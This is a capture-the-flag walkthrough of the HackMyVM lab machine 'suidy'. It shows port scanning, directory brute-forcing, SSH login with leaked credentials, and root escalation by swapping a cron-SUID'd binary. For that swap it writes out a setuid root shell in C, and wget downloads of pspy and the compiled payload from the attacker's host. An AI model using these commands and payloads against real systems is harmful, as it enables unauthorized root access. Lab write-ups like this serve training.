HackMyVM - suidy

You can start playing there > HackMyVM

Summary

This one was as tricky box, we start by finding a message that provide us access to the box. Privesc to root is tricky we have to detect a cronjob that set SUID to a specific file. We have to recreate our own SUID C shell and replace it. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ ip=192.168.1.5
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 21:43 EEST
Nmap scan report for undiscovered.thm (192.168.1.5)
Host is up (0.00042s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:3F:4E:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds
$ nmap -p 22,80 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 21:44 EEST
Nmap scan report for undiscovered.thm (192.168.1.5)
Host is up (0.00044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8a:cb:7e:8a:72:82:84:9a:11:43:61:15:c1:e6:32:0b (RSA)
|   256 7a:0e:b6:dd:8f:ee:a7:70:d9:b1:b5:6e:44:8f:c0:49 (ECDSA)
|_  256 80:18:e6:c7:01:0e:c6:6d:7d:f4:d2:9f:c9:d0:6f:4c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).

Let’s start the enumeration on port 80 with a gobuster scan:

1
2
3
$ gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html 
/index.html (Status: 200)
/robots.txt (Status: 200)

/robots.txt in the very end has a directory:

1
2
3
4
5
6
7
$ curl http://192.168.1.5/robots.txt
/hi
/....\..\.-\--.\.-\..\-.

..space..

/shehatesme

Shell as theuser

This directory has a message:

1
She hates me because I FOUND THE REAL SECRET! I put in this directory a lot of .txt files. ONE of .txt files contains credentials like "theuser/thepass" to access to her system! All that you need is an small dict from Seclist! 

This is the tricky part, we can see the credentials already theuser/thepass so we can login in using SSH. :smile:

1
2
3
4
5
6
$ ssh theuser@$ip                                        
theuser@192.168.1.5's password: 

theuser@suidy:~$ whoami;id
theuser
uid=1000(theuser) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Shell as root

Box name is suidy so let’s search for SUID files:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsrwsr-x 1 root theuser 16704 sep 26 23:46 /home/suidy/suidyyyyy
-rwsr-xr-x 1 root root 63568 ene 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root 34888 ene 10  2019 /usr/bin/umount
-rwsr-xr-x 1 root root 51280 ene 10  2019 /usr/bin/mount
-rwsr-xr-x 1 root root 84016 jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54096 jul 27  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44440 jul 27  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 44528 jul 27  2018 /usr/bin/chsh
-rwsr-xr-- 1 root messagebus 51184 jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 ene 31  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 mar 28  2017 /usr/lib/eject/dmcrypt-get-device

/home/suidy/suidyyyyy perfect! If we run it we get shell as suidy but after that nothing:

1
2
3
4
theuser@suidy:~$ /home/suidy/suidyyyyy
suidy@suidy:~$ whoami;id
suidy
uid=1001(suidy) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Here i got stuck for a long time & i decided to run pspy:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
suidy@suidy:/tmp$ wget -q 192.168.1.14/pspy64
suidy@suidy:/tmp$ chmod +x pspy64
suidy@suidy:/tmp$ ./pspy64 -p -i 1000
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855

     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

..data.. 

2020/10/01 20:56:01 CMD: UID=0    PID=653    | /bin/sh -c sh /root/timer.sh 
2020/10/01 20:56:01 CMD: UID=0    PID=654    | sh /root/timer.sh 

There is a cronjob that runs this file as root, after some experiments i found out that this file gives SUID to /home/suidy/suidyyyyy. So let’s make a SUID C shell, compile it and transfer it on the box to replace /home/suidy/suidyyyyy:

1
2
3
4
5
6
7
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}
1
2
3
$ touch suid.c
$ nano suid.c 
$ gcc suid.c -o suid

Let’s move it on the target system now:

1
2
3
4
5
6
7
8
9
theuser@suidy:/home/suidy$ wget -q 192.168.1.14/suid -O suidyyyyy
theuser@suidy:/home/suidy$ ls -la suidyyyyy 
-rwxrwxr-x 1 root theuser 16704 oct  1 21:01 suidyyyyy
theuser@suidy:/home/suidy$ ls -la suidyyyyy 
-rwsrwsr-x 1 root theuser 16704 oct  1 21:01 suidyyyyy
theuser@suidy:/home/suidy$ ./suidyyyyy 
root@suidy:/home/suidy# whoami;id
root
uid=0(root) gid=0(root) grupos=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(theuser)

Let’s read the flags:

1
2
3
4
root@suidy:/root# cat root.txt | cut -c1-5
HMV00
root@suidy:/root# cat /home/theuser/user.txt | cut -c1-5
HMV23

Tricky box! :smile: